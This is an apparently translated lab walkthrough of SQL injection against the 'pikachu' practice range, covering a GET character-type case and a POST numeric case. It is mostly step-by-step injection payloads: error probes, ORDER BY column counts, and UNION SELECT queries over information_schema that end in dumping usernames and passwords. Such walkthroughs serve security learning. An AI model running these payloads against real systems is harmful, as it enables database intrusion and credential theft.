Table of contents
1. Judging parameter passing and injection points
2. Judgment number of characters
3. Determine the database name
1. Judging parameter passing and injection points
2. Judgment number of characters
1. Character type (GET)
1. Judging parameter passing and injection points
Entering the shooting range, you can see an input box, so now it judges the type of injection point. After entering 1' in the input box, an error is reported and displayed in the URL. The method of judging the parameter submission is GET.
Enter a statement in the URL bar, and it is judged to be a character-type SQL injection vulnerability
1' #report error
1'and'1'='1 #no error reported
1'and'1'='2 #no error reported
In summary, it is a character SQL injection vulnerability
2. Judgment number of characters
Enter a statement to query the statement, and when 3 is found, an error is reported, and there are only 2 judgment fields
1' order by 1,2,3 --+
3. Determine the database name
Enter the statement and found that the database name is pikachu
1' union select 1,database() --+
4. Lookup table
Enter the statement, since there may be more than one table, you can use the aggregate function group_concat() query
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
5. Lookup field
1' union select 1,group_concat(column_name) from information_schema.columns where table_name 'users' --+
6. Get data
1' union select username,password from users --+
Two, digital (POST)
1. Judging parameter passing and injection points
After submitting the data, it is found that there is no data displayed in the URL, and the parameter type is judged as POST, and the BP is used to capture the packet. The id=&submit= is found below, which is the injection point. Copy this injection point and send it to hacrkbar Determine the type of injection point, and after entering the statement, determine the digit-type SQL injection vulnerability
2. Judgment number of characters
Enter the following statement, an error is reported at 3, indicating that the database has only two fields
id 1 order by 3 # 
3. Get the database name
id 1 union select 1,database() 
4. Check table name
Enter the statement, since there may be more than one table, you can use the aggregate function group_concat() query
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
5. Check the field name
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' #
6. Get data
id=1 union select password,username from users #